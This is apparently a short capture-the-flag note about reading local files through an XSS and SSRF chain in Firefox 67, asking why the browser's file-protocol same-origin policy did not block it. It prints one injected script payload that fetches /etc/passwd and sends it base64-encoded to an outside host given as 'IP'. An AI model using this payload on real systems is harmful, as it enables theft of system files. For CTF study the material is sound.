Tags: ssrf directorylisting xss
Rating:
I noticed an issue:in FireFox,starting in Gecko 1.9, the file protocol's SOP restricts the files to be read must be in the same directory or in the sub directory
But I just test the challenge server:
```
file:///app/templates/index.html?grey","status":"ok","content":["\"><script>fetch('file:///etc/passwd').then(r=>r.text()).then(data=>fetch('http://IP/'%2Bbtoa(data)))</script>
(The content has been truncated)
It's ok to read /etc/passwd
The FireFox on chanllenge server is version 67,it should ban the request to file:///etc/passwd,so why?